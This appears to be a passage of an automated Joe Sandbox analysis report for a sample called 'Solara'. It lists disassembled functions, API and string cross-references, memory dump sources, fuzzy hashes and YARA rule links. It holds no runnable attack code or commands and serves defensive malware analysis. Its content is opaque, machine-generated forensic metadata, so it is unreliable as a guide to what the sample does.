Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 3b0c0d2693032fcd2a595d6e9f902d804d8294aa2ca9d95a7f823cbcbec2d0a4
Instruction ID: a2ebf689c2865b50d49a5747fabdc6f1fe39300e72979f2b8e71e258bb3fc402
Opcode Fuzzy Hash: 3b0c0d2693032fcd2a595d6e9f902d804d8294aa2ca9d95a7f823cbcbec2d0a4
Instruction Fuzzy Hash: 02F030B5510114BFEB049B94DC4AEBF7BBCEB09794F104029F902DA450E2B1EE00E760

Function 0043322E Relevance: 56.1, APIs: 1, Strings: 31, Instructions: 146memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004332E4

Strings

3, xrefs: 00433499
), xrefs: 004334C9
h, xrefs: 00433381
+, xrefs: 004334D9
;, xrefs: 00433459
!, xrefs: 00433509
], xrefs: 00433321
Q, xrefs: 004333E1
7, xrefs: 00433479
c, xrefs: 00433421
5, xrefs: 00433469
%, xrefs: 004334E9
b, xrefs: 00433391
#, xrefs: 00433519
T, xrefs: 00433311
', xrefs: 004334F9
", xrefs: 00433521
a, xrefs: 004333D1
R, xrefs: 004333F1
9, xrefs: 00433449
1, xrefs: 00433489
/, xrefs: 004334B9
I, xrefs: 004332FD
-, xrefs: 004334A9
r, xrefs: 00433341
=, xrefs: 00433429
Y, xrefs: 00433307
c, xrefs: 004333A1
?, xrefs: 00433439
{, xrefs: 004333B1
a, xrefs: 00433331

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: AllocString
String ID: !$"$#$%$'$)$+$-$/$1$3$5$7$9$;$=$?$I$Q$R$T$Y$]$a$a$b$c$c$h$r${
API String ID: 2525500382-2513824458
Opcode ID: db803e73eb57c6d99aba7a560505e665c17ad81a19c08ea0f41ba71f1f78f7e5
Instruction ID: ec1a6813e2cc4ffa1bb43567f46c38aba4ccc173f8c13d6f3834154b4e0b6a17
Opcode Fuzzy Hash: db803e73eb57c6d99aba7a560505e665c17ad81a19c08ea0f41ba71f1f78f7e5
Instruction Fuzzy Hash: CF91A12150CBC28DD336863C98097DBBED15BA7224F484B9E91F98A2E3C7B54246C767

Function 00436450 Relevance: 44.0, APIs: 2, Strings: 23, Instructions: 211COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00436492
GetSystemMetrics.USER32 ref: 004364A2

Strings

jzC, xrefs: 00436642
`wC, xrefs: 00436852
PuC, xrefs: 004366DC
X}C, xrefs: 004365DF
xoC, xrefs: 004366B0
UvC, xrefs: 00436663
Z~C, xrefs: 00436873
h|C, xrefs: 00436781
FzC, xrefs: 004366BB
A C, xrefs: 0043645A, 00436545, 00436894, 004368AA, 004368C0, 004368D6, 004368EC, 00436902, 00436918, 0043692E, 00436944, 0043695A, 00436970, 00436986, 0043699C, 004369B2, 004369C8, 004369DE, 004369F4, 00436A0A, 00436A20, 00436A36, 00436A4C, 00436A62, 00436A78, 00436A8E, 00436AA4, 00436ABA, 00436AD0, 00436AE6, 00436AFC, 00436B12, 00436B28, 00436B3E, 00436B54, 00436B6A, 00436B80, 00436B96, 00436BAC, 00436BC2, 00436BD8
'nC, xrefs: 00436776
QoC, xrefs: 00436708
lsC, xrefs: 004367D9
f{C, xrefs: 004367FA
vC, xrefs: 00436729
}C, xrefs: 004365EA
tuC, xrefs: 00436658
|pC, xrefs: 0043671E
rmC, xrefs: 00436566
,uC, xrefs: 0043668F
.vC, xrefs: 00436847
UpC, xrefs: 00436713
4}C, xrefs: 004365F5

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: MetricsSystem
String ID: vC$'nC$,uC$.vC$4}C$A C$FzC$PuC$QoC$UpC$UvC$X}C$Z~C$`wC$f{C$h|C$jzC$lsC$rmC$tuC$xoC$|pC$}C
API String ID: 4116985748-174186748
Opcode ID: 1de41a796f7c7c2945f359baaf60d5e23e1d7e1d519e82fa3b264251056bc7c6
Instruction ID: 0a8f1a278ffd458be4205ed3a482d6bf25b80cb1d2324e41d2521270be2f79d3
Opcode Fuzzy Hash: 1de41a796f7c7c2945f359baaf60d5e23e1d7e1d519e82fa3b264251056bc7c6
Instruction Fuzzy Hash: 51F126B04593C89BE775DF15C5897DBBAE5BBC6308F648E2E91C84B250C7B8014CDB8A

Function 00433B68 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 96COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00433B72
VariantInit.OLEAUT32 ref: 00433B85

Strings

z, xrefs: 00433C10
m, xrefs: 00433C00
}, xrefs: 00433C40
g, xrefs: 00433BD0
g, xrefs: 00433BC0
u, xrefs: 00433C20
d, xrefs: 00433BE0
m, xrefs: 00433BB0
L, xrefs: 00433BA0
{, xrefs: 00433C50
N, xrefs: 00433BF0
}, xrefs: 00433C60
F, xrefs: 00433C30

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: Variant$ClearInit
String ID: F$L$N$d$g$g$m$m$u$z${$}$}
API String ID: 2610073882-4216798751
Opcode ID: 9b2272d1c2637700aef6298ac09221ce17400ed7ccb67fd97863bc5ac1f88d49
Instruction ID: 6d437fe010267870698063eaedda02719b7ac4a53ee0bb3831a6a63f692259f6
Opcode Fuzzy Hash: 9b2272d1c2637700aef6298ac09221ce17400ed7ccb67fd97863bc5ac1f88d49
Instruction Fuzzy Hash: 9B51293154C3C28AE335DA28C4587EFBED15B92308F098D6DC4DD5B682D7BA0548D763

Function 0043435E Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00434368
VariantInit.OLEAUT32 ref: 0043437B

Strings

e, xrefs: 004343FE
i, xrefs: 0043441E
c, xrefs: 004343CE
k, xrefs: 0043440E
a, xrefs: 004343DE
g, xrefs: 004343EE
o, xrefs: 0043442E
s, xrefs: 0043444E
Q, xrefs: 00434396
r, xrefs: 00434446
m, xrefs: 0043443E
., xrefs: 00434406

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: Variant$ClearInit
String ID: .$Q$a$c$e$g$i$k$m$o$r$s
API String ID: 2610073882-439072438
Opcode ID: 7074daab4ed169e7569e339999eefcd785e9f2a5b70f89b33a64958011d00b3f
Instruction ID: a4b1fb7a3ba408c63527201464c1baa79c0f6012301206869f4e40615d8653b3
Opcode Fuzzy Hash: 7074daab4ed169e7569e339999eefcd785e9f2a5b70f89b33a64958011d00b3f
Instruction Fuzzy Hash: 3641486100D7C18EE3719B7898987DBBFD0ABA6314F084EAED0D89B382C67941488727

Function 00C42078 Relevance: 24.4, APIs: 16, Instructions: 438COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4207F
int.LIBCPMT ref: 00C42272
int.LIBCPMT ref: 00C422C8
int.LIBCPMT ref: 00C4230D
int.LIBCPMT ref: 00C42350
int.LIBCPMT ref: 00C423BC
int.LIBCPMT ref: 00C4243D

Part of subcall function 00C4171A: __Getctype.LIBCPMT ref: 00C41729

Part of subcall function 00C3C999: __EH_prolog3.LIBCMT ref: 00C3C9A0
Part of subcall function 00C3C999: std::_Lockit::_Lockit.LIBCPMT ref: 00C3C9AA
Part of subcall function 00C3C999: int.LIBCPMT ref: 00C3C9C1
Part of subcall function 00C3C999: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CA1B

Part of subcall function 00C3CAC3: __EH_prolog3.LIBCMT ref: 00C3CACA
Part of subcall function 00C3CAC3: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CAD4
Part of subcall function 00C3CAC3: int.LIBCPMT ref: 00C3CAEB
Part of subcall function 00C3CAC3: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CB45

Part of subcall function 00C3CC82: __EH_prolog3.LIBCMT ref: 00C3CC89
Part of subcall function 00C3CC82: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CC93
Part of subcall function 00C3CC82: int.LIBCPMT ref: 00C3CCAA
Part of subcall function 00C3CC82: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD04

Part of subcall function 00C3CBED: __EH_prolog3.LIBCMT ref: 00C3CBF4
Part of subcall function 00C3CBED: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CBFE
Part of subcall function 00C3CBED: int.LIBCPMT ref: 00C3CC15
Part of subcall function 00C3CBED: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CC6F

Part of subcall function 00C2A7E6: __EH_prolog3.LIBCMT ref: 00C2A7ED
Part of subcall function 00C2A7E6: std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
Part of subcall function 00C2A7E6: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E

numpunct.LIBCPMT ref: 00C42464

Part of subcall function 00C3D9B3: __EH_prolog3.LIBCMT ref: 00C3D9BA

Part of subcall function 00C3D1BF: __EH_prolog3.LIBCMT ref: 00C3D1C6
Part of subcall function 00C3D1BF: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D1D0
Part of subcall function 00C3D1BF: int.LIBCPMT ref: 00C3D1E7
Part of subcall function 00C3D1BF: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D241

Part of subcall function 00C3D2E9: __EH_prolog3.LIBCMT ref: 00C3D2F0
Part of subcall function 00C3D2E9: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D2FA
Part of subcall function 00C3D2E9: int.LIBCPMT ref: 00C3D311
Part of subcall function 00C3D2E9: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D36B

Part of subcall function 00C2A7E6: Concurrency::cancel_current_task.LIBCPMT ref: 00C2A8A9

Part of subcall function 00C3C61B: __EH_prolog3.LIBCMT ref: 00C3C622
Part of subcall function 00C3C61B: std::_Lockit::_Lockit.LIBCPMT ref: 00C3C62C
Part of subcall function 00C3C61B: int.LIBCPMT ref: 00C3C643
Part of subcall function 00C3C61B: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C69D

int.LIBCPMT ref: 00C4248C
int.LIBCPMT ref: 00C4209C

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C42102
int.LIBCPMT ref: 00C42147
int.LIBCPMT ref: 00C4218A
int.LIBCPMT ref: 00C4220E
__Getcoll.LIBCPMT ref: 00C42234
int.LIBCPMT ref: 00C424F0

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetcollGetctypenumpunct
String ID:
API String ID: 2694696949-0
Opcode ID: 48c46b235cc415da14f074f7e757bab5ed3b66a83d528964b2e978a084909c00
Instruction ID: 0d7f6d69cd870e9f73b15a3744740658111320c3ad5b024baa6ac82cd147de0f
Opcode Fuzzy Hash: 48c46b235cc415da14f074f7e757bab5ed3b66a83d528964b2e978a084909c00
Instruction Fuzzy Hash: 52D138B1C04325ABDB216F759C03A7FBBB9FF81760F148019F95567242DB708E40A7A6

Function 00C4254A Relevance: 24.4, APIs: 16, Instructions: 438COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C42551
int.LIBCPMT ref: 00C42744
int.LIBCPMT ref: 00C4279A
int.LIBCPMT ref: 00C427DF
int.LIBCPMT ref: 00C42822
int.LIBCPMT ref: 00C4288E
int.LIBCPMT ref: 00C4290F

Part of subcall function 00C21CEA: __Getctype.LIBCPMT ref: 00C21CF9

Part of subcall function 00C3CA2E: __EH_prolog3.LIBCMT ref: 00C3CA35
Part of subcall function 00C3CA2E: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CA3F
Part of subcall function 00C3CA2E: int.LIBCPMT ref: 00C3CA56
Part of subcall function 00C3CA2E: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CAB0

Part of subcall function 00C3CB58: __EH_prolog3.LIBCMT ref: 00C3CB5F
Part of subcall function 00C3CB58: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CB69
Part of subcall function 00C3CB58: int.LIBCPMT ref: 00C3CB80
Part of subcall function 00C3CB58: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CBDA

Part of subcall function 00C3CDAC: __EH_prolog3.LIBCMT ref: 00C3CDB3
Part of subcall function 00C3CDAC: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CDBD
Part of subcall function 00C3CDAC: int.LIBCPMT ref: 00C3CDD4
Part of subcall function 00C3CDAC: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CE2E

Part of subcall function 00C3CD17: __EH_prolog3.LIBCMT ref: 00C3CD1E
Part of subcall function 00C3CD17: std::_Lockit::_Lockit.LIBCPMT ref: 00C3CD28
Part of subcall function 00C3CD17: int.LIBCPMT ref: 00C3CD3F
Part of subcall function 00C3CD17: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD99

Part of subcall function 00C2A7E6: __EH_prolog3.LIBCMT ref: 00C2A7ED
Part of subcall function 00C2A7E6: std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
Part of subcall function 00C2A7E6: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E

numpunct.LIBCPMT ref: 00C42936

Part of subcall function 00C3D9E6: __EH_prolog3.LIBCMT ref: 00C3D9ED

Part of subcall function 00C3D254: __EH_prolog3.LIBCMT ref: 00C3D25B
Part of subcall function 00C3D254: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D265
Part of subcall function 00C3D254: int.LIBCPMT ref: 00C3D27C
Part of subcall function 00C3D254: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D2D6

Part of subcall function 00C3D37E: __EH_prolog3.LIBCMT ref: 00C3D385
Part of subcall function 00C3D37E: std::_Lockit::_Lockit.LIBCPMT ref: 00C3D38F
Part of subcall function 00C3D37E: int.LIBCPMT ref: 00C3D3A6
Part of subcall function 00C3D37E: std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D400

Part of subcall function 00C2A7E6: Concurrency::cancel_current_task.LIBCPMT ref: 00C2A8A9

Part of subcall function 00C269A7: __EH_prolog3.LIBCMT ref: 00C269AE
Part of subcall function 00C269A7: std::_Lockit::_Lockit.LIBCPMT ref: 00C269B8
Part of subcall function 00C269A7: int.LIBCPMT ref: 00C269CF
Part of subcall function 00C269A7: std::_Lockit::~_Lockit.LIBCPMT ref: 00C26A29

int.LIBCPMT ref: 00C4295E
int.LIBCPMT ref: 00C4256E

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C425D4
int.LIBCPMT ref: 00C42619
int.LIBCPMT ref: 00C4265C
int.LIBCPMT ref: 00C426E0
__Getcoll.LIBCPMT ref: 00C42706
int.LIBCPMT ref: 00C429C2

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetcollGetctypenumpunct
String ID:
API String ID: 2694696949-0
Opcode ID: 8818eb3305791ec97dcd499a6e0c33307da73b86a3989fb47ee98e244ff205b4
Instruction ID: 44275323d9eeb700612d73e9d56d66089c38be6109354902accc08690bdbeaa8
Opcode Fuzzy Hash: 8818eb3305791ec97dcd499a6e0c33307da73b86a3989fb47ee98e244ff205b4
Instruction Fuzzy Hash: F2D139B2C04325ABCB206F759C03A7FBAB5FF91760F15441DF95567282EB308A40A7A6

Function 004341ED Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 82COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004341F7
VariantInit.OLEAUT32 ref: 0043420A

Strings

+, xrefs: 00434259
-, xrefs: 0043423B
3, xrefs: 00434231
%, xrefs: 00434263
!, xrefs: 00434277
#, xrefs: 00434281
', xrefs: 0043426D
), xrefs: 0043424F
/, xrefs: 00434245
1, xrefs: 00434227

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3
API String ID: 2610073882-2331977360
Opcode ID: 4b2ff6a19490661dd97030cd7318d2a4d61e6c7925bc5b0f44817881ddce85e1
Instruction ID: 084519ba09f15f54216546a2bc129c5999e7b13f9af0ad8356666cc8c042fcba
Opcode Fuzzy Hash: 4b2ff6a19490661dd97030cd7318d2a4d61e6c7925bc5b0f44817881ddce85e1
Instruction Fuzzy Hash: 2541056000C7C19AD3629B38948835BBFE15BA7228F485A9DF1E50B3E2C3768109CB57

Function 00434034 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 75COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043403E
VariantInit.OLEAUT32 ref: 00434051

Strings

-, xrefs: 00434082
', xrefs: 004340B4
3, xrefs: 00434078
/, xrefs: 0043408C
%, xrefs: 004340AA
#, xrefs: 004340C8
+, xrefs: 004340A0
!, xrefs: 004340BE
), xrefs: 00434096
1, xrefs: 0043406E

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3
API String ID: 2610073882-2331977360
Opcode ID: 1a20efacf0e195b30e754bf8a711b6bddaf53a2e7060570804146ab8a04217dc
Instruction ID: f8a351fd608090bec9361875ee0b16c1ea26082387d95b7d0fc6e22f3608a586
Opcode Fuzzy Hash: 1a20efacf0e195b30e754bf8a711b6bddaf53a2e7060570804146ab8a04217dc
Instruction Fuzzy Hash: 7541D47000C7C19AD362DB38948835ABFE15BA7228F481A9DF5E54B3E2C3768549CB57

Function 00C59768 Relevance: 19.8, APIs: 13, Instructions: 332COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C59831
DName::operator+.LIBCMT ref: 00C5986E
DName::DName.LIBVCRUNTIME ref: 00C59882
DName::operator+.LIBCMT ref: 00C59891
DName::operator+.LIBCMT ref: 00C5991F
DName::DName.LIBVCRUNTIME ref: 00C59947
DName::operator+.LIBCMT ref: 00C59955
DName::operator+.LIBCMT ref: 00C5998F
DName::operator+.LIBCMT ref: 00C599D0
UnDecorator::getReturnType.LIBCMT ref: 00C59A00
operator+.LIBVCRUNTIME ref: 00C59B02

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
String ID:
API String ID: 2932655852-0
Opcode ID: 3980284e21e6a22b3871d03bc1d0a42b0c65abd346bd1c16fbf83e98177c729a
Instruction ID: 83b49d69b1047b1daedf49040d33d2bd746ff341470934df71dd1c3a5834117d
Opcode Fuzzy Hash: 3980284e21e6a22b3871d03bc1d0a42b0c65abd346bd1c16fbf83e98177c729a
Instruction Fuzzy Hash: 43C1947D900208EFCB14DFA4D9959ED77B8EB08301F54419EF906A7291EB309AC9DB68

Function 00C5AD63 Relevance: 19.8, APIs: 13, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C5ADCE
DName::operator+.LIBCMT ref: 00C5AF11

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

DName::operator+.LIBCMT ref: 00C5AEBC
DName::operator+.LIBCMT ref: 00C5AF5D
DName::operator+.LIBCMT ref: 00C5AF6C
DName::operator+.LIBCMT ref: 00C5B098
DName::operator=.LIBVCRUNTIME ref: 00C5B0D8
DName::DName.LIBVCRUNTIME ref: 00C5B0E2
DName::operator+.LIBCMT ref: 00C5B0FF
DName::operator+.LIBCMT ref: 00C5B10B

Part of subcall function 00C5C625: Replicator::operator[].LIBCMT ref: 00C5C662

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
String ID:
API String ID: 1043660730-0
Opcode ID: e008ba0d85b916961d63c490cb613e1e140c392ea9f4d29cb6ac93179fd24f43
Instruction ID: ee25f09ab1bd3e64e68fccb68aee8c41e51fe2d57cd9b66f01e433052b4414ab
Opcode Fuzzy Hash: e008ba0d85b916961d63c490cb613e1e140c392ea9f4d29cb6ac93179fd24f43
Instruction Fuzzy Hash: 72C1B3B9900304AFDB24DFA4C845BEEBBF4AF08306F14415DE955A7281EB759ACDCB18

Function 0043359C Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004335AD

Strings

m, xrefs: 004335EB
S, xrefs: 004335F5
V, xrefs: 0043360E
W, xrefs: 00433609
k, xrefs: 004335CD
i, xrefs: 004335D7
U, xrefs: 00433613
Q, xrefs: 004335FF
o, xrefs: 004335E1

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: InitVariant
String ID: Q$S$U$V$W$i$k$m$o
API String ID: 1927566239-286780673
Opcode ID: 9cb09c364e5b36dec20ad39ce086e80b3f9db0063f4d46314c7ffdaba325edd6
Instruction ID: 50e60367779120f07c3bb968cef5a4fc575c46cc91a9ebde744b89d391a95e3b
Opcode Fuzzy Hash: 9cb09c364e5b36dec20ad39ce086e80b3f9db0063f4d46314c7ffdaba325edd6
Instruction Fuzzy Hash: 1A418D7290CBD08ED3219B38C48938FBFD1AB96318F194A5EE4E897392C7788544CB53

Function 00C57ED3 Relevance: 16.9, APIs: 11, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00C57F46
shared_ptr.LIBCMT ref: 00C57F8E
shared_ptr.LIBCMT ref: 00C57FAD
operator+.LIBVCRUNTIME ref: 00C580DB
DName::operator=.LIBVCRUNTIME ref: 00C580ED
shared_ptr.LIBCMT ref: 00C58332
DName::operator+.LIBCMT ref: 00C58374
operator+.LIBVCRUNTIME ref: 00C583BA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: 92b8e7efc0cd7e2a15cdc6190909af047d08af60c19ee8debf66db86ab25ae08
Instruction ID: 48d42b219b308dcb677d59dd94915fad53c13f70d08613687c38862848f74fe4
Opcode Fuzzy Hash: 92b8e7efc0cd7e2a15cdc6190909af047d08af60c19ee8debf66db86ab25ae08
Instruction Fuzzy Hash: C8E18DB9C0420A9BCF04DFD5C498AFEBBB4AB05706F50821AD922B7250DB74578DCF99

Function 00C4C00E Relevance: 16.8, APIs: 11, Instructions: 277COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4C015

Part of subcall function 00C4AC99: __EH_prolog3_GS.LIBCMT ref: 00C4ACA0
Part of subcall function 00C4AC99: __Getcoll.LIBCPMT ref: 00C4AD04
Part of subcall function 00C4AC99: std::_Locinfo::~_Locinfo.LIBCPMT ref: 00C4AD20

__Getcoll.LIBCPMT ref: 00C4C064

Part of subcall function 00C4A7EA: __EH_prolog3.LIBCMT ref: 00C4A7F1
Part of subcall function 00C4A7EA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4A7FB
Part of subcall function 00C4A7EA: int.LIBCPMT ref: 00C4A812
Part of subcall function 00C4A7EA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A86C

Part of subcall function 00C2A7E6: __EH_prolog3.LIBCMT ref: 00C2A7ED
Part of subcall function 00C2A7E6: std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
Part of subcall function 00C2A7E6: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E

int.LIBCPMT ref: 00C4C03E

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C4C0A2
int.LIBCPMT ref: 00C4C0F8
int.LIBCPMT ref: 00C4C13D
int.LIBCPMT ref: 00C4C180
int.LIBCPMT ref: 00C4C1EC
int.LIBCPMT ref: 00C4C26D
numpunct.LIBCPMT ref: 00C4C294
int.LIBCPMT ref: 00C4C2BC

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Getcoll$H_prolog3_LocinfoLocinfo::~_numpunct
String ID:
API String ID: 4001742795-0
Opcode ID: 100ff75ce2e9bcc71af7eafeb9edb016db00d07ca07dba4c0af6ef39136a42f3
Instruction ID: 105d9efde2d9c7974740fae7ff2533fc8b8e990a32a5b26c69273563fbbf9a7d
Opcode Fuzzy Hash: 100ff75ce2e9bcc71af7eafeb9edb016db00d07ca07dba4c0af6ef39136a42f3
Instruction Fuzzy Hash: DA9138B1C06211ABDB60AF759C4267F7BB9FF81720F10841DF855A7253DB708E00A7A6

Function 00C5C625 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 185COMMONLIBRARYCODE

